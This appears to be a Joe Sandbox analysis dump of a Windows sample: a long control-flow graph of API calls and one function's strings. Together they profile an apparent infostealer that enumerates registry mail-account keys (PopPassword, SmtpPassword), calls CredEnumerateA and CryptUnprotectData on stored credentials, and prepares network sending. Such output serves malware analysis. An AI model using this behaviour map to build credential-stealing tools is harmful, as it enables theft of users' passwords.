API calls 10479->10482 10485 409f00 79 API calls 10479->10485 10490 4018f4 LocalFree 10479->10490 10480->10464 10483 409f40 10481->10483 10482->10479 10484 409f5f 10483->10484 10487 401e88 6 API calls 10483->10487 10486 4018f4 LocalFree 10484->10486 10485->10479 10486->10476 10488 409f4d 10487->10488 10494 409d85 10488->10494 10490->10479 10491 409f5a 10493->10468 10495 401fbb GetFileAttributesA 10494->10495 10496 409d94 10495->10496 10497 409d98 10496->10497 10498 401fbb GetFileAttributesA 10496->10498 10497->10491 10500 409da5 10498->10500 10688 40190b LocalAlloc 10671->10688 10673 40ecd8 RegOpenKeyA 10674 40ee00 10673->10674 10685 40ecf5 10673->10685 10675 4018f4 LocalFree 10674->10675 10677 40ee0b 10675->10677 10676 40ecfc RegEnumKeyExA 10678 40ed25 RegCloseKey 10676->10678 10676->10685 10677->9048 10678->10674 10680 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10680->10685 10681 401dad 6 API calls 10681->10685 10682 401e34 5 API calls 10684 40ed86 GetPrivateProfileStringA 10682->10684 10683 40ecc5 45 API calls 10683->10685 10684->10685 10685->10676 10685->10680 10685->10681 10685->10682 10685->10683 10686 4045d1 41 API calls 10685->10686 10687 4018f4 LocalFree 10685->10687 10686->10685 10687->10685 10688->10673 10690 401dad 6 API calls 10689->10690 10691 405780 10690->10691 10692 4057e0 10691->10692 10693 401e34 5 API calls 10691->10693 10692->9056 10694 405794 10693->10694 10717 405747 10694->10717 10697 401e34 5 API calls 10698 4057af 10697->10698 10699 405747 16 API calls 10698->10699 10700 4057bd 10699->10700 10701 401e34 5 API calls 10700->10701 10702 4057ca 10701->10702 10703 405747 16 API calls 10702->10703 10704 4057d8 10703->10704 10705 4018f4 LocalFree 10704->10705 10705->10692 10718 405750 10717->10718 10719 405766 10717->10719 10720 4042ec 16 API calls 10718->10720 10719->10697 10721 40575e 10720->10721 10722 4018f4 LocalFree 10721->10722 10722->10719 10737 40e833 10736->10737 10738 40e837 10736->10738 10737->9095 10747 40190b LocalAlloc 10738->10747 10740 40e841 lstrlenA 10742 40e880 10740->10742 10743 40e86b 10740->10743 10745 4018f4 LocalFree 10742->10745 10744 4045d1 41 API calls 10743->10744 10744->10742 10746 40e888 10745->10746 10746->9095 10747->10740 10761 40c3c5 10748->10761 10751 40c3c5 46 API calls 10752 40c42c 10751->10752 10753 40c3c5 46 API calls 10752->10753 10754 40c443 10753->10754 10755 40c3c5 46 API calls 10754->10755 10756 40c45a 10755->10756 10757 40c3c5 46 API calls 10756->10757 10758 40c471 10757->10758 10759 40c3c5 46 API calls 10758->10759 10760 40c488 10759->10760 10760->9099 10762 401eed 7 API calls 10761->10762 10763 40c3d0 10762->10763 10764 40c3f7 10763->10764 10765 401e88 6 API calls 10763->10765 10764->10751 10766 40c3dd 10765->10766 10767 404426 41 API calls 10766->10767 10768 40c3f2 10767->10768 10769 4018f4 LocalFree 10768->10769 10769->10764 10771 401eed 7 API calls 10770->10771 10772 408ef4 10771->10772 10773 408f07 10772->10773 10800 408dad 10772->10800 10773->9112 10776 4018f4 LocalFree 10776->10773 10778 408c48 10777->10778 10781 408c43 10777->10781 10779 4018f4 LocalFree 10778->10779 10780 408da9 10779->10780 10780->9124 10781->10778 10782 408c68 10781->10782 10783 408c59 10781->10783 10785 401e34 5 API calls 10782->10785 10784 401e34 5 API calls 10783->10784 10786 408c66 10784->10786 10785->10786 10787 408c8c FindFirstFileA 10786->10787 10787->10778 10797 408cab 10787->10797 10801 408dc7 10800->10801 10802 408dcc 10800->10802 10801->10802 10803 401e34 5 API calls 10801->10803 10804 4018f4 LocalFree 10802->10804 10805 408dde 10803->10805 10806 408ee5 10804->10806 10807 408df5 FindFirstFileA 10805->10807 10806->10776 10807->10802 10812 408e14 10807->10812 10808 408eb5 FindNextFileA 10810 408ecf FindClose 10808->10810 10808->10812 10809 408e26 lstrcmpiA 10811 408e40 lstrcmpiA 10809->10811 10809->10812 10810->10802 10811->10812 10812->10808 10812->10809 10813 401e34 5 API calls 10812->10813 10814 401e88 6 API calls 10812->10814 10813->10812 10815 408e82 StrStrIA 10814->10815 10816 408eb0 10815->10816 10817 408e9d 10815->10817 10819 4018f4 LocalFree 10816->10819 10818 408c29 38 API calls 10817->10818 10818->10816 10819->10808 10955 405b02 10910->10955 10956 401dad 6 API calls 10955->10956 10957 405b1b 10956->10957 10958 401dad 6 API calls 10957->10958 10959 405b31 10958->10959 10960 401dad 6 API calls 10959->10960 10961 405b47 10960->10961 10962 401dad 6 API calls 10961->10962 10963 405b5f 10962->10963 10964 401dad 6 API calls 10963->10964 10965 405b75 10964->10965 10966 401dad 6 API calls 10965->10966 10969 405b8d 10966->10969 10967 4018f4 LocalFree 10968 405c36 10967->10968 10970 4018f4 LocalFree 10968->10970 10972 401607 lstrlenA 10969->10972 10989 405c09 10969->10989 10974 405bc4 10972->10974 10976 401607 lstrlenA 10974->10976 10978 405bcf 10976->10978 10989->10967 10991 401eed 7 API calls 10990->10991 10992 405f66 10991->10992 11000 4045d1 41 API calls 10999->11000 11001 405f42 11000->11001 11002 4045d1 41 API calls 11001->11002 11003 405f57 11002->11003 11003->9197 11005 401637 11004->11005 11005->9215 11007 401eed 7 API calls 11006->11007 11008 4060b1 11007->11008 11009 406103 11008->11009 11010 401e88 6 API calls 11008->11010 11009->9225 11011 4060c0 11010->11011 11012 4045d1 41 API calls 11011->11012 11013 4060d6 11012->11013 11014 4045d1 41 API calls 11013->11014 11015 4060ea 11014->11015 11016 4045d1 41 API calls 11015->11016 11017 4060fe 11016->11017 11018 4018f4 LocalFree 11017->11018 11018->11009 11020 40e512 11019->11020 11021 40e63a 11019->11021 11022 401dad 6 API calls 11020->11022 11021->9233 11023 40e524 11022->11023 11024 401dad 6 API calls 11023->11024 11025 40e539 11024->11025 11026 401dad 6 API calls 11025->11026 11027 40e550 11026->11027 11028 401dad 6 API calls 11027->11028 11029 40e565 11028->11029 11030 401dad 6 API calls 11029->11030 11031 40e57a 11030->11031 11032 40e60a 11031->11032 11037 40465c 2 API calls 11031->11037 11033 4018f4 LocalFree 11032->11033 11034 40e612 11033->11034 11035 4018f4 LocalFree 11034->11035 11036 40e61a 11035->11036 11038 4018f4 LocalFree 11036->11038 11043 40e5ad 11037->11043 11043->11032 11045 401607 lstrlenA 11043->11045 11046 40e5db 11045->11046 11047 401607 lstrlenA 11046->11047 11048 40e5e6 11047->11048 11053 40e703 11052->11053 11059 40e65e 11052->11059 11053->9237 11054 40e665 RegEnumValueA 11055 40e693 RegCloseKey 11054->11055 11054->11059 11055->11053 11057 401dad 6 API calls 11057->11059 11058 40e6c0 StrStrIA 11058->11059 11059->11054 11059->11057 11059->11058 11061 4018f4 LocalFree 11059->11061 11062 40e3bc 11059->11062 11061->11059 11063 401f72 2 API calls 11062->11063 11064 40e3cb 11063->11064 11065 40e3cf 11064->11065 11066 40203a 7 API calls 11064->11066 11065->11059 11067 40e3e0 11066->11067 11077 40e4ee 11067->11077 11082 40190b LocalAlloc 11067->11082 11069 40e409 StrStrA 11070 40e41d lstrlenA StrStrA 11069->11070 11072 40e418 11069->11072 11071 40e442 lstrlenA 11070->11071 11070->11072 11080 40e3f0 11071->11080 11074 4018f4 LocalFree 11072->11074 11075 40e4e5 11074->11075 11076 4020cf 3 API calls 11075->11076 11076->11077 11077->11059 11078 40465c 2 API calls 11078->11080 11079 4018f4 LocalFree 11079->11080 11080->11069 11080->11072 11080->11078 11080->11079 11081 401607 lstrlenA 11080->11081 11083 402a6a lstrlenA 11080->11083 11081->11080 11082->11080 11086 40190b LocalAlloc 11083->11086 11085 402a7c lstrcpyA 11085->11080 11086->11085 11088 404748 11087->11088 11089 40470a GetProcAddress 11087->11089 11088->9254 11089->11088 11090 404719 GetProcAddress 11089->11090 11090->11088 11091 40472a GetCurrentProcess 11090->11091 11092 404738 11091->11092 11092->9254 11092->11088 11093->9256 11095 4015e9 11094->11095 11095->9258 11097 404761 11096->11097 11098 404773 11096->11098 11097->11098 11099 40477a AllocateAndInitializeSid 11097->11099 11098->9261 11100 4047bb 11099->11100 11101 4047bd CheckTokenMembership 11099->11101 11100->9261 11102 4047d7 11101->11102 11103 4047de FreeSid 11101->11103 11102->11103 11103->9261 11105 402844 18 API calls 11104->11105 11106 404800 11105->11106 11107 40480b CoCreateGuid 11106->11107 11108 404876 11106->11108 11107->11108 11164->9286 11165->9294 11167 401dad 6 API calls 11166->11167 11168 40f26e 11167->11168 11169 40f288 11168->11169 11194 40f1df 11168->11194 11171 401dad 6 API calls 11169->11171 11173 40f29c 11171->11173 11175 40f2b6 11173->11175 11177 40f1df 41 API calls 11173->11177 11176 401dad 6 API calls 11175->11176 11179 40f2ca 11176->11179 11178 40f2ae 11177->11178 11180 4018f4 LocalFree 11178->11180 11181 40f2e4 11179->11181 11182 40f1df 41 API calls 11179->11182 11180->11175 11195 4045d1 41 API calls 11194->11195 11196 40f1fa 11195->11196 11197 4045d1 41 API calls 11196->11197 11198 40f20f 11197->11198 11199 401ff6 4 API calls 11198->11199 11208 40f176 11207->11208 11215 40ee8f 11207->11215 11208->9315 11209 40ee96 RegEnumKeyExA 11210 40eebf RegCloseKey 11209->11210 11209->11215 11210->11208 11211 401e34 5 API calls 11211->11215 11213 401e88 6 API calls 11213->11215 11214 401dad 6 API calls 11214->11215 11215->11209 11215->11211 11215->11213 11215->11214 11216 40ee6f 15 API calls 11215->11216 11217 401607 lstrlenA 11215->11217 11218 4018f4 LocalFree 11215->11218 11216->11215 11217->11215 11218->11215 11220 4083e8 11219->11220 11227 4081f4 11219->11227 11220->9345 11221 4081fb RegEnumKeyExA 11222 408224 RegCloseKey 11221->11222 11221->11227 11222->11220 11224 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 11224->11227 11225 401dad 6 API calls 11225->11227 11226 401607 lstrlenA 11226->11227 11227->11221 11227->11224 11227->11225 11227->11226 11228 4081d4 11 API calls 11227->11228 11229 4018f4 LocalFree 11227->11229 11228->11227 11229->11227 11231 40ac06 11230->11231 11235 40ab5c 11230->11235 11232 40a9d6 17 API calls 11231->11232 11233 40ac2b 11232->11233 11239 40ac2f 11233->11239 11234 40abbe StrStrIW 11234->11235 11235->11231 11235->11234 11248 40a9d6 lstrlenW 11235->11248 11237 40abee CoTaskMemFree 11237->11235 11238 40abfc CoTaskMemFree 11237->11238 11238->11235 11240 40ac3f 11239->11240 11241 40ad65 11240->11241 11242 40ac84 CredEnumerateA 11240->11242 11241->9352 11242->11241 11245 40acaf 11242->11245 11243 40ad5c CredFree 11243->11241 11244 40accb lstrlenW CryptUnprotectData 11244->11245 11245->11241 11245->11243 11245->11244 11246 40ad3e LocalFree 11245->11246 11274 40a7e6 11245->11274 11246->11245 11249 40a9e9 11248->11249 11254 40a9ee 11248->11254 11249->11237 11250 40aa4a wsprintfA 11253 401e88 6 API calls 11250->11253 11251 40aa1e wsprintfA 11252 401e88 6 API calls 11251->11252 11252->11254 11255 40aa71 11253->11255 11254->11250 11254->11251 11256 401dad 6 API calls 11255->11256 11257 40aa8b 11256->11257 11258 40ab2a 11257->11258 11260 40aaa0 lstrlenW 11257->11260 11261 40ab22 11257->11261 11259 4018f4 LocalFree 11258->11259 11263 40ab32 11259->11263 11260->11261 11264 40aad2 CryptUnprotectData 11260->11264 11262 4018f4 LocalFree 11261->11262 11262->11258 11263->11237 11264->11261 11265 40aaf0 11264->11265 11265->11261 11268 40a7ad 11265->11268 11272 4015a5 11268->11272 11270 40a7bb lstrlenW 11271 40a7d4 11270->11271 11273 4015b6 11272->11273 11273->11270 11275 4015a5 11274->11275 11276 40a7f4 lstrlenA 11275->11276 11277 40a809 11276->11277 11277->11246 11279 4080e4 11278->11279 11284 407ea2 11278->11284 11279->9359 11280 407ea9 RegEnumKeyExA 11281 407ed2 RegCloseKey 11280->11281 11280->11284 11281->11279 11283 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 11283->11284 11284->11280 11284->11283 11285 401dad 6 API calls 11284->11285 11286 4018f4 LocalFree 11284->11286 11287 401607 lstrlenA 11284->11287 11288 407e82 11 API calls 11284->11288 11285->11284 11286->11284 11287->11284 11288->11284 11290 401eed 7 API calls 11289->11290 11292 4092a6 11290->11292 11291 4092e3 11291->9369 11292->11291 11293 401e88 6 API calls 11292->11293 11294 4092b5 11293->11294 11295 4045d1 41 API calls 11294->11295 11296 4092ca 11295->11296 11297 4045d1 41 API calls 11296->11297 11298 4092de 11297->11298 11299 4018f4 LocalFree 11298->11299 11299->11291 11301 406bdd 11300->11301 11307 40697e 11300->11307 11301->9428 11302 406985 RegEnumKeyExA 11303 4069ae RegCloseKey 11302->11303 11302->11307 11303->11301 11305 401e34 5 API calls 11305->11307 11306 401e88 6 API calls 11306->11307 11307->11302 11307->11305 11307->11306 11308 401dad 6 API calls 11307->11308 11309 40465c 2 API calls 11307->11309 11310 4018f4 LocalFree 11307->11310 11311 401607 lstrlenA 11307->11311 11308->11307 11309->11307 11310->11307 11311->11307 11313 405127 11312->11313 11315 405122 11312->11315 11314 4018f4 LocalFree 11313->11314 11316 405290 11314->11316 11315->11313 11317 405147 11315->11317 11318 405138 11315->11318 11316->9464 11320 401e34 5 API calls 11317->11320 11319 401e34 5 API calls 11318->11319 11321 405145 11319->11321 11320->11321 11322 40516b FindFirstFileA 11321->11322 11322->11313 11323 40518a 11322->11323 11324 405198 lstrcmpiA 11323->11324 11325 4051fd StrStrIA 11323->11325 11330 401e34 5 API calls 11323->11330 11332 401e88 6 API calls 11323->11332 11334 40523b StrStrIA 11323->11334 11336 405252 11323->11336 11327 4051aa 11324->11327 11328 4051af lstrcmpiA 11324->11328 11325->11323 11326 405260 FindNextFileA 11325->11326 11326->11323 11329 40527a FindClose 11326->11329 11327->11326 11331 401e34 5 API calls 11327->11331 11333 401e88 6 API calls 11327->11333 11335 405108 24 API calls 11327->11335 11339 4018f4 LocalFree 11327->11339 11328->11327 11329->11313 11330->11323 11331->11327 11332->11323 11333->11327 11334->11323 11335->11327 11338 4018f4 LocalFree 11336->11338 11351 4050f1 11336->11351 11338->11326 11339->11327 11341 401eed 7 API calls 11340->11341 11342 4052a9 11341->11342 11343 4052c4 11342->11343 11344 401e34 5 API calls 11342->11344 11345 405108 31 API calls 11343->11345 11346 4052bb 11344->11346 11347 4052d4 11345->11347 11348 4018f4 LocalFree 11346->11348 11349 4018f4 LocalFree 11347->11349 11348->11343 11350 4052dc 11349->11350 11350->9459 11352 4042ec 16 API calls 11351->11352 11353 405104 11352->11353 11353->11336 11355 401eed 7 API calls 11354->11355 11356 40dc2e 11355->11356 11357 40dc5b 11356->11357 11358 401e88 6 API calls 11356->11358 11357->9471 11359 40dc3d 11358->11359 11360 404426 41 API calls 11359->11360 11361 40dc56 11360->11361 11362 4018f4 LocalFree 11361->11362 11362->11357 11364 40e155 11363->11364 11369 40df40 11363->11369 11364->9499 11365 40df47 RegEnumKeyExA 11366 40df70 RegCloseKey 11365->11366 11365->11369 11366->11364 11368 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 11368->11369 11369->11365 11369->11368 11370 401dad 6 API calls 11369->11370 11371 40df20 11 API calls 11369->11371 11372 4018f4 LocalFree 11369->11372 11373 401607 lstrlenA 11369->11373 11370->11369 11371->11369 11372->11369 11373->11369 11375 40d024 11374->11375 11376 40cfa8 11374->11376 11375->9505 11376->11375 11377 40cfba CredEnumerateA 11376->11377 11377->11375 11378 40cfe1 11377->11378 11378->11375 11379 40d01b CredFree 11378->11379 11381 40cee7 11378->11381 11379->11375 11382 40cefa 11381->11382 11383 401607 lstrlenA 11382->11383 11384 40cf05 11383->11384 11385 401607 lstrlenA 11384->11385 11386 40cf10 11385->11386 11387 40cf1e StrStrIA 11386->11387 11388 40cf2f lstrlenA StrStrIA 11387->11388 11393 40cf7b 11387->11393 11389 40cf4d 11388->11389 11394 402fc9 inet_addr 11389->11394 11391 40cf5b 11392 401607 lstrlenA 11391->11392 11391->11393 11392->11393 11393->11378 11395 402fd9 gethostbyname 11394->11395 11396 402fe5 11394->11396 11395->11396 11396->11391 11398 401eed 7 API calls 11397->11398 11399 4055bd 11398->11399 11400 405654 11399->11400 11401 401e34 5 API calls 11399->11401 11400->9518 11402 4055d5 11401->11402 11403 405478 29 API calls 11402->11403 11404 4055e4 11403->11404 11405 4018f4 LocalFree 11404->11405 11406 4055e9 11405->11406 11407 401e34 5 API calls 11406->11407 11408 4055f6 11407->11408 11409 405478 29 API calls 11408->11409 11410 405605 11409->11410 11411 4018f4 LocalFree 11410->11411 11412 40560a 11411->11412 11413 401e34 5 API calls 11412->11413 11414 405617 11413->11414 11427 401dad 6 API calls 11426->11427 11429 405452 11427->11429 11428 405474 11428->9528 11429->11428 11430 4018f4 LocalFree 11429->11430 11430->11428 11432 405492 11431->11432 11433 405497 11431->11433 11432->11433 11434 401e34 5 API calls 11432->11434 11435 4018f4 LocalFree 11433->11435 11437 4054a7 11434->11437 11436 4055ab 11435->11436 11436->9515 11455 405417 11437->11455 11440 4018f4 LocalFree 11441 4054b6 11440->11441 11442 401e34 5 API calls 11441->11442 11443 4054c3 11442->11443 11444 4054da FindFirstFileA 11443->11444 11444->11433 11445 4054f9 11444->11445 11446 405507 lstrcmpiA 11445->11446 11447 40557b FindNextFileA 11445->11447 11449 405521 lstrcmpiA 11446->11449 11453 40551f 11446->11453 11447->11445 11448 405595 FindClose 11447->11448 11448->11433 11449->11453 11450 401e34 5 API calls 11450->11453 11451 401e88 6 API calls 11451->11453 11452 405417 16 API calls 11452->11453 11453->11447 11453->11450 11453->11451 11453->11452 11454 4018f4 LocalFree 11453->11454 11454->11447 11456 4042ec 16 API calls 11455->11456 11457 40542a 11456->11457 11457->11440 11459 407851 11458->11459 11468 407693 11458->11468 11459->9544 11460 40769a RegEnumKeyExA 11461 4076c3 RegCloseKey 11460->11461 11460->11468 11461->11459 11463 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 11463->11468 11464 401dad 6 API calls 11464->11468 11465 4018f4 LocalFree 11465->11468 11466 401607 lstrlenA 11466->11468 11467 407673 11 API calls 11467->11468 11468->11460 11468->11463 11468->11464 11468->11465 11468->11466 11468->11467 11470 40b2d0 11469->11470 11478 40b1bc 11469->11478 11470->9549 11471 40b1c3 RegEnumKeyExA 11472 40b1ec RegCloseKey 11471->11472 11471->11478 11472->11470 11474 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 11474->11478 11475 401dad 6 API calls 11475->11478 11476 4018f4 LocalFree 11476->11478 11477 40b199 21 API calls 11477->11478 11478->11471 11478->11474 11478->11475 11478->11476 11478->11477 11480 40af00 11478->11480 11543 40190b LocalAlloc 11480->11543 11482 40af10 11544 40190b LocalAlloc 11482->11544 11484 40af1d 11545 40190b LocalAlloc 11484->11545 11486 40af2a 11546 40190b LocalAlloc 11486->11546 11488 40af37 11547 40190b LocalAlloc 11488->11547 11490 40af44 11548 40190b LocalAlloc 11490->11548 11492 40af51 11549 40190b LocalAlloc 11492->11549 11494 40af5e 7 API calls 11495 401dad 6 API calls 11494->11495 11543->11482 11544->11484 11545->11486 11546->11488 11547->11490 11548->11492 11549->11494 11558 40da50 11557->11558 11565 40d8a1 11557->11565 11558->9553 11559 40d8a8 RegEnumKeyExA 11560 40d8d1 RegCloseKey 11559->11560 11559->11565 11560->11558 11562 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 11562->11565 11563 401dad 6 API calls 11563->11565 11564 40d87e 11 API calls 11564->11565 11565->11559 11565->11562 11565->11563 11565->11564 11566 401607 lstrlenA 11565->11566 11567 4018f4 LocalFree 11565->11567 11566->11565 11567->11565 11569 40720b 11568->11569 11578 40703e 11568->11578 11569->9592 11570 407045 RegEnumKeyExA 11571 40706e RegCloseKey 11570->11571 11570->11578 11571->11569 11573 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 11573->11578 11574 401dad 6 API calls 11574->11578 11575 40465c 2 API calls 11575->11578 11576 4018f4 LocalFree 11576->11578 11577 401607 lstrlenA 11577->11578 11578->11570 11578->11573 11578->11574 11578->11575 11578->11576 11578->11577 11580 401f72 2 API calls 11579->11580 11581 407296 11580->11581 11582 40729a 11581->11582 11583 40729f 11581->11583 11582->9617 11584 40203a 7 API calls 11583->11584 11585 4072ab 11584->11585 11586 40734b 11585->11586 11596 40190b LocalAlloc 11585->11596 11586->9617 11606 40794d 11605->11606 11611 4078be 11605->11611 11606->9634 11607 4078c5 RegEnumValueA 11608 4078ee RegCloseKey 11607->11608 11607->11611 11608->11606 11609 401dad 6 API calls 11609->11611 11611->11607 11611->11609 11612 4018f4 LocalFree 11611->11612 11612->11611 11613->9643 11615 404ecd 11614->11615 11616 404dab 11614->11616 11615->9648 11617 404dc4 11616->11617 11618 401e88 6 API calls 11616->11618 11619 401dad 6 API calls 11617->11619 11618->11617 11620 404dde 11619->11620 11621 404e00 11620->11621 11622 401e34 5 API calls 11620->11622 11623 401dad 6 API calls 11621->11623 11624 404dec 11622->11624 11625 404e16 11623->11625 11626 404d87 16 API calls 11624->11626 11627 404e38 11625->11627 11630 401e34 5 API calls 11625->11630 11628 404df6 11626->11628 11629 401dad 6 API calls 11627->11629 11631 4018f4 LocalFree 11628->11631 11632 404e4f 11629->11632 11633 404e24 11630->11633 11634 404dfb 11631->11634 11635 404e71 11632->11635 11638 401e34 5 API calls 11632->11638 11636 404d87 16 API calls 11633->11636 11637 4018f4 LocalFree 11634->11637 11639 401dad 6 API calls 11635->11639 11640 404e2e 11636->11640 11637->11621 11641 404e5d 11638->11641 11643 4018f4 LocalFree 11640->11643 11670 401eed 7 API calls 11669->11670 11671 407d0a 11670->11671 11672 407d47 11671->11672 11673 401e88 6 API calls 11671->11673 11672->9729 11674 407d19 11673->11674 11675 4045d1 41 API calls 11674->11675 11676 407d2e 11675->11676 11677 4045d1 41 API calls 11676->11677 11678 407d42 11677->11678 11679 4018f4 LocalFree 11678->11679 11679->11672 11681 407cfb 11680->11681 11686 407bb4 11680->11686 11681->9737 11682 407bbb RegEnumKeyExA 11683 407be4 RegCloseKey 11682->11683 11682->11686 11683->11681 11685 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 11685->11686 11686->11682 11686->11685 11687 401dad 6 API calls 11686->11687 11688 4018f4 LocalFree 11686->11688 11689 4045d1 41 API calls 11686->11689 11690 407b94 45 API calls 11686->11690 11687->11686 11688->11686 11689->11686 11690->11686 11692 401dad 6 API calls 11691->11692 11693 40616a 11692->11693 11694 406183 11693->11694 11696 4045d1 41 API calls 11693->11696 11695 401dad 6 API calls 11694->11695 11697 406199 11695->11697 11698 40617e 11696->11698 11699 4061b2 11697->11699 11701 4045d1 41 API calls 11697->11701 11700 4018f4 LocalFree 11698->11700 11702 40461c 46 API calls 11699->11702 11700->11694 11703 4061ad 11701->11703 11704 4061c5 11702->11704 11705 4018f4 LocalFree 11703->11705 11704->9744 11705->11699 11707 401eed 7 API calls 11706->11707 11708 40c948 11707->11708 11709 40c975 11708->11709 11710 401e88 6 API calls 11708->11710 11711 401eed 7 API calls 11709->11711 11712 40c957 11710->11712 11713 40c97d 11711->11713 11714 404426 41 API calls 11712->11714 11715 40c9aa 11713->11715 11717 401e88 6 API calls 11713->11717 11716 40c970 11714->11716 11715->9768 11718 4018f4 LocalFree 11716->11718 11719 40c98c 11717->11719 11718->11709 11720 404426 41 API calls 11719->11720 11721 40c9a5 11720->11721 11722 4018f4 LocalFree 11721->11722 11722->11715 11724 406fab 11723->11724 11732 406e0a 11723->11732 11724->9807 11725 406e11 RegEnumKeyExA 11726 406e3a RegCloseKey 11725->11726 11725->11732 11726->11724 11728 401e34 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 11728->11732 11729 401dad 6 API calls 11729->11732 11730 4018f4 LocalFree 11730->11732 11731 401607 lstrlenA 11731->11732 11732->11725 11732->11728 11732->11729 11732->11730 11732->11731 11810 402c2c 11811 402c36 11810->11811 11813 402c4e 11811->11813 11814 4029b5 11811->11814 11815 4029c5 11814->11815 11816 4029d7 11814->11816 11815->11816 11817 4029de LookupPrivilegeValueA 11815->11817 11816->11811 11818 4029fa GetCurrentProcess OpenProcessToken 11817->11818 11823 402a54 11817->11823 11819 402a3b AdjustTokenPrivileges 11818->11819 11822 402a12 11818->11822 11819->11823 11820 402a63 11820->11811 11821 402a5b CloseHandle 11821->11820 11822->11819 11823->11820 11823->11821 11829 40ff32 11836 4017c4 GetHGlobalFromStream 11829->11836 11831 40ff3d 11832 402844 18 API calls 11831->11832 11834 40ff52 11832->11834 11833 40ff78 11834->11833 11835 4018f4 LocalFree 11834->11835 11835->11833 11837 401805 11836->11837 11838 4017da 11836->11838 11837->11831 11839 4017e2 GlobalLock 11838->11839 11839->11837 11840 4017f1 11839->11840 11841 4024d5 2 API calls 11840->11841 11842 4017fd GlobalUnlock 11841->11842 11842->11837 12298 40bef4 12299 40bf0b 12298->12299 12300 40bf02 12298->12300 12300->12299 12301 40bf86 CryptUnprotectData 12300->12301 12301->12299 12302 40bfb9 12301->12302 12302->12299 12303 40bfdd LocalFree 12302->12303 12303->12299 12304 40bff5 12303->12304 12304->12299 12313 40190b LocalAlloc 12304->12313 12306 40c011 12307 40c022 lstrlenA StrCmpNIA 12306->12307 12308 40c056 12307->12308 12309 40c03e lstrlenA StrCmpNIA 12307->12309 12310 40c05a lstrlenA StrCmpNIA 12308->12310 12312 40c072 12308->12312 12309->12308 12310->12312 12311 4018f4 LocalFree 12311->12299 12312->12311 12313->12306 11935 4100b6 11945 403927 WSAStartup 11935->11945 11937 4101a1 11938 41018d 11938->11937 11940 40272a 19 API calls 11938->11940 11939 4100bd 11939->11937 11939->11938 11942 41016c Sleep 11939->11942 11944 40fe31 6 API calls 11939->11944 11946 4038c3 11939->11946 11955 401bfc GetHGlobalFromStream 11939->11955 11940->11937 11942->11939 11944->11939 11945->11939 11947 4038d2 11946->11947 11950 403918 11946->11950 11948 4038d8 GetHGlobalFromStream 11947->11948 11947->11950 11949 4038e8 11948->11949 11948->11950 11951 4038f0 GlobalLock 11949->11951 11950->11939 11951->11950 11952 4038ff 11951->11952 11965 4036c0 11952->11965 11956 401cba 11955->11956 11957 401c1c 11955->11957 11956->11939 11957->11956 11958 401c31 GlobalLock 11957->11958 11958->11956 11959 401c3d 11958->11959 12054 40190b LocalAlloc 11959->12054 11961 401c48 11962 401c59 GlobalUnlock 11961->11962 11963 401c72 11962->11963 11964 4018f4 LocalFree 11963->11964 11964->11956 12004 40190b LocalAlloc 11965->12004 11967 4036db 12005 40190b LocalAlloc 11967->12005 11969 4036e8 12006 40190b LocalAlloc 11969->12006 11971 4036f5 12007 40190b LocalAlloc 11971->12007 11973 403702 InternetCrackUrlA 11974 403750 11973->11974 11975 403756 11973->11975 11974->11975 11976 40375b InternetCreateUrlA 11974->11976 11978 4018f4 LocalFree 11975->11978 11976->11975 11977 403780 InternetCrackUrlA 11976->11977 11977->11975 11980 4037c1 11977->11980 11979 403895 11978->11979 11981 4018f4 LocalFree 11979->11981 11980->11975 11982 4037cc ObtainUserAgentString 11980->11982 11983 40389d 11981->11983 11984 4037fc wsprintfA 11982->11984 11985 4037de wsprintfA 11982->11985 11986 4018f4 LocalFree 11983->11986 11987 40381a 11984->11987 11985->11987 11988 4038a5 11986->11988 12004->11967 12005->11969 12006->11971 12007->11973 12054->11961 12055 41087f OleInitialize 12071 40256e 12055->12071 12057 41088b 12090 402c53 12057->12090 12059 41089a 12060 4108b4 12059->12060 12061 41089e 12059->12061 12072 402514 2 API calls 12071->12072 12073 40257d 12072->12073 12074 402514 2 API calls 12073->12074 12075 40258c 12074->12075 12076 402514 2 API calls 12075->12076 12077 40259b 12076->12077 12078 402514 2 API calls 12077->12078 12079 4025aa 12078->12079 12080 402514 2 API calls 12079->12080 12081 4025b9 12080->12081 12082 402514 2 API calls 12081->12082 12083 4025c8 12082->12083 12084 402514 2 API calls 12083->12084 12085 4025d7 12084->12085 12086 402514 2 API calls 12085->12086 12087 4025e6 12086->12087 12088 402514 2 API calls 12087->12088 12089 4025f5 12088->12089 12089->12057 12091 402c6a 12090->12091 12092 402c6c 12090->12092 12091->12059 12093 402c88 12092->12093 12094 402c8d GetCurrentProcess OpenProcessToken 12092->12094 12093->12059 12095 402d39 12094->12095 12096 402ca9 GetTokenInformation 12094->12096 12095->12059

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EE82
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EEB6
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F171
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                        • API String ID: 1332880857-2111798378
